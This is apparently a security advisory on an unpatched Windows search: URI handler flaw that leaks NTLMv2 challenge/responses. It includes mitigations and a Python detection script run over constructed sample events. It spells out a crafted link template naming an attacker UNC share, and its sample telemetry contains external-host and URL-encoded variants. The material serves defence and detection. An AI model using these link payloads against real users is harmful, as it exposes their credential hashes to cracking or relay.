Full Report
Cybersecurity researchers have disclosed details of an unpatched issue that could be exploited to disclose a user's NTLMv2 hash to an attacker. As in the case of CVE-2026-33829, which impacted the Windows Snipping Tool's ms-screensketch: URI handler, the newly flagged issue resides in the search: URI handler, per Huntress. CVE-2026-33829 refers to a spoofing vulnerability that could expose
Analysis Summary
# Vulnerability: Windows Search URI Handler NTLMv2 Hash Leak
## CVE Details
- **CVE ID**: Unassigned (the report draws parallels to **CVE-2026-33829**, the Snipping Tool `ms-screensketch:` handler flaw, and **CVE-2023-35636**, the Outlook NTLM leak)
- **CVSS Score**: Not assigned; estimated in the 4.3 to 6.5 range by analogy with the similar NTLM-disclosure flaws above
- **CWE**: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
## Affected Systems
- **Products**: Microsoft Windows
- **Versions**: All versions that register the `search:` URI handler (current Windows 10 and Windows 11 environments).
- **Configurations**: Systems where NTLM authentication is still permitted for outgoing connections and where outbound SMB (TCP/445, TCP/139) can reach the attacker's host. Hosts with the WebClient service running are also exposed over HTTP, because Windows falls back to WebDAV when a UNC path cannot be reached over SMB.
## Vulnerability Description
The Windows `search:` URI handler does not validate the path supplied in its `crumb` parameter. As with the earlier Snipping Tool flaw, a `location:` crumb that names a Universal Naming Convention (UNC) path is used as-is. When a user clicks a crafted link such as `search:query=test&crumb=location:\\<attacker-ip>\share`, the operating system attempts to open the UNC path over Server Message Block (SMB) and, with no prompt to the user, performs an NTLM authentication handshake with the attacker-controlled server. What the attacker captures is the NTLMv2 challenge/response (often called the Net-NTLMv2 hash): it is not the user's NT hash and cannot be used for pass-the-hash, but it can be cracked offline if the password is weak, or relayed to another service while the handshake is still live.
## Exploitation
- **Status**: PoC available / Disclosed (Microsoft has declined to patch at this time).
- **Complexity**: Low (Requires minimal user interaction: clicking a link).
- **Attack Vector**: Network (via Web browser, email link, or malicious document).
## Impact
- **Confidentiality**: Medium (disclosure of NTLMv2 challenge/responses, which can be cracked offline or relayed to services that do not require signing or channel binding).
- **Integrity**: None (Directly).
- **Availability**: None.
## Remediation
### Patches
- **None**: As of June 2026, Microsoft has declined to issue a security update, stating the issue does not meet the "Important" or "Critical" severity bar for immediate servicing.
### Workarounds
- **Block Outbound SMB**: Restrict outbound traffic on TCP/445 and TCP/139 at the network perimeter and in the host firewall for devices that do not need to reach external file shares. Because Windows retries unreachable UNC paths over WebDAV when the WebClient service is running, also stop and disable WebClient on endpoints that do not need it; otherwise the same handshake can leak over TCP/80 or TCP/443.
- **Enforce SMB Signing**: Require "Microsoft network client/server: Digitally sign communications (always)" so a captured handshake cannot be relayed to internal SMB servers. Note that this protects SMB targets only; relay to LDAP or HTTP endpoints needs LDAP signing, LDAP channel binding, and Extended Protection for Authentication on those services.
- **Restrict or Disable NTLM**: Move to Kerberos and set "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to "Deny all", after an audit phase with "Audit all" and the "Add remote server exceptions for NTLM authentication" list populated for any legacy hosts that still require it.
## Detection
- **Indicators of Compromise**:
- Outbound SMB connections (TCP/445, TCP/139) from workstations to external or otherwise unexpected IP addresses; from hosts running WebClient, also outbound WebDAV (TCP/80, TCP/443) immediately following a failed SMB attempt.
- Process creation events in which the handler is launched with a `search:` URI whose `crumb=location:` value is a UNC path pointing outside the organisation.
- **Detection methods**: With command-line auditing enabled (Windows Security event 4688, or Sysmon event ID 1), alert on command lines containing `search:` together with `crumb=location:\\`; decode URL-encoding first, since `%5C%5C` is a valid spelling of `\\`. Correlate with Sysmon event ID 3 or host-firewall logs for connections to port 445 at non-internal destinations. Most browsers prompt before handing a `search:` URI to the OS, so the process creation event is the earliest reliable signal.
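The following Python script is an added example and not code from the Huntress research or the original report. It applies the two detection rules above to constructed telemetry: it parses the `search:` URI out of a process command line, extracts the `crumb=location:` value (decoding URL-encoding first), and flags it when it is a UNC path to a host outside a set of assumed internal ranges; it also flags outbound connections to TCP/445 or TCP/139 at non-internal destinations. The sample event lines, the `proc|...|...` record format, the internal address ranges, the `.corp.example` suffix and the process image name are all constructed for the example. The handling of `search-ms:` is a generalisation beyond the report: that handler documents the same `crumb` parameter.

```python
import ipaddress
import re
from urllib.parse import unquote

# Assumed internal address space (what "external" is measured against).
# A real deployment would use the organisation's own ranges; the Python
# ipaddress.is_private flag is deliberately not used because it also marks
# the RFC 5737 documentation ranges used in the sample below as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_SUFFIXES = (".corp.example",)   # assumed internal DNS suffix
SMB_PORTS = {"445", "139"}

# Matches a search: or search-ms: URI anywhere in a command line.
URI_RE = re.compile(r"\bsearch(?:-ms)?:", re.IGNORECASE)
# Captures the crumb=location: value up to the next delimiter.
CRUMB_RE = re.compile(r'crumb=location:(?P<loc>[^&"\s]+)', re.IGNORECASE)
# A UNC path: two leading separators, then the host, then a separator or end.
UNC_RE = re.compile(r"^[\\/]{2}(?P<host>[^\\/]+)(?:[\\/]|$)")

# Constructed sample telemetry (not real logs). Each line stands in for a
# Sysmon event: "proc" for process creation (EID 1), "net" for a network
# connection (EID 3). The explorer.exe image name is an assumption; the
# rule keys on the command-line text, not on the image.
SAMPLE_EVENTS = [
    r'proc|image=C:\Windows\explorer.exe|cmd="C:\Windows\explorer.exe" "search:query=test&crumb=location:\\203.0.113.10\share"',
    r'proc|image=C:\Windows\explorer.exe|cmd="C:\Windows\explorer.exe" "search:query=invoice&crumb=location:C:\Users\alice\Documents"',
    r'proc|image=C:\Windows\explorer.exe|cmd="C:\Windows\explorer.exe" "search:query=x&crumb=location:\\fileserver01\public"',
    r'proc|image=C:\Windows\explorer.exe|cmd="C:\Windows\explorer.exe" "search-ms:query=x&crumb=location%3A%5C%5C198.51.100.7%5Cshare"',
    r"net|image=C:\Windows\System32\svchost.exe|dst=203.0.113.10|dport=445",
    r"net|image=C:\Windows\System32\svchost.exe|dst=10.0.0.5|dport=445",
    r"net|image=C:\Program Files\Mozilla Firefox\firefox.exe|dst=203.0.113.10|dport=443",
]


def parse_event(line):
    """Split one constructed 'kind|key=value|...' record into a dict."""
    kind, *fields = line.split("|")
    record = {"kind": kind}
    for field in fields:
        key, _, value = field.partition("=")   # first '=' only; values may contain '='
        record[key] = value
    return record


def is_external_host(host):
    """True when host lies outside the assumed internal ranges/suffixes."""
    host = host.strip().lower().rstrip(".")
    host = host.split("@")[0]   # drop \\host@port / \\host@SSL WebDAV suffixes
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        if "." not in host:     # single-label name: treated as intranet (assumption)
            return False
        return not host.endswith(INTERNAL_SUFFIXES)
    return not any(ip in net for net in INTERNAL_NETS)


def crumb_unc_host(cmdline):
    """Return the UNC host named by crumb=location: in a search: URI, else None."""
    decoded = unquote(cmdline)          # %5C%5C -> \\ , %3A -> :
    if not URI_RE.search(decoded):
        return None
    crumb = CRUMB_RE.search(decoded)
    if not crumb:
        return None
    unc = UNC_RE.match(crumb.group("loc"))
    return unc.group("host") if unc else None


def analyze(lines):
    """Run both rules over the telemetry and return the alerts raised."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev["kind"] == "proc":
            host = crumb_unc_host(ev.get("cmd", ""))
            if host and is_external_host(host):
                alerts.append({"rule": "search-uri-external-unc", "host": host, "event": line})
        elif ev["kind"] == "net":
            dst = ev.get("dst", "")
            if ev.get("dport") in SMB_PORTS and is_external_host(dst):
                alerts.append({"rule": "outbound-smb-external", "host": dst, "event": line})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] host={alert['host']}  {alert['event']}")
```

On the sample set the script raises three alerts: the two `search:`/`search-ms:` launches whose crumb names an external UNC host (one of them URL-encoded) and the svchost connection to port 445 at an external address. The local-path crumb, the single-label internal share and the HTTPS connection are left alone. In production the second rule is the noisier one on laptops that legitimately roam; tie it to the first by host and a short time window before paging anyone.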
## References
- **Huntress Research**: hxxps[://]www[.]huntress[.]com/blog/unpatched-ntlm-leak-windows-search-uri-handler
- **Microsoft CVE-2026-33829 Advisory**: hxxps[://]msrc[.]microsoft[.]com/update-guide/vulnerability/CVE-2026-33829
- **Varonis Research (CVE-2023-35636)**: hxxps[://]www[.]varonis[.]com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes